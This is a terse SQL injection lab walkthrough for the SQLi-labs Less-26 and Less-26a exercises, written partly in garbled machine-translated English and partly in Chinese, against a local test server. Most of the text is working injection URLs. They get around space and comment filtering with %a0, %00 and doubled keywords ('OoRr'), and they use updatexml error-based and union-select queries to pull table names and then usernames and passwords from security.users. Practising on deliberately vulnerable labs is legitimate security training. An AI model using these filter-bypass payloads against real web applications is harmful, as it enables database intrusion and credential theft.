less26
id = 1 correct echo
id = 1 'an error
id = 1 '- + error but the display does not show - + comment symbol obtained
http://192.168.50.100/sqli/Less-26/?id=1 ';% 00 displayed properly specify the presence of vulnerability
Check the code found in the code have to replace the filter in a statement code the Notes - + #, spaces or forward slash
http://192.168.50.100/sqli/Less-26/?id=1 'OoRr' 1 '=' 1
method:
or may be replaced by ||
&&% and 26% may be 26
With the Notes; alternatively 00%
Spaces replaced by% a0
A law
Check the library http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(database())),1)||'1'='1
http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = 0x7365637572697479))),1)||'1'='1
Check column
http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = 0x7573657273) )),1)||'1'='1
Remove the value field of information look-up table, but out of the value of small, incomplete.
http://192.168.50.100/sqli/Less-26/?id=1'||updatexml(1,concat(0x7e, ( select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) )),1)||'1'='1
http://192.168.50.100/sqli/Less-26/?id=1‘ || updatexml(1, concat(0x7e, ( select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) where (id=2) ) ) ,1) || ’1‘=‘1 通过改变id的值可以遍历所有的数据。
以上的方法中,因为不能使用空格,所以采用报错注入的形式。我们如果使用字符进行替换呢?将空格替换为编码字符如何解决?
less26 法二 使用字符替换
http://192.168.50.100/sqli/Less-26/?id=0'%a0union%a0select%a0 1,2,
(select%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00
%a 相当于空格 转码问题
less26a
id=1 返回正常
id=1' 返回错误
http://192.168.50.100/sqli/Less-26a/?id=1' || '1'='1
可以看到他屏蔽的输出错误,所以不能再用updatexml报错注入
%a0相当于空格,没有空格会报错
替代绕过:
http://192.168.50.100/sqli/Less-26a/?id=0') %a0 union%a0 select%a0 1,2,
(select %a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00
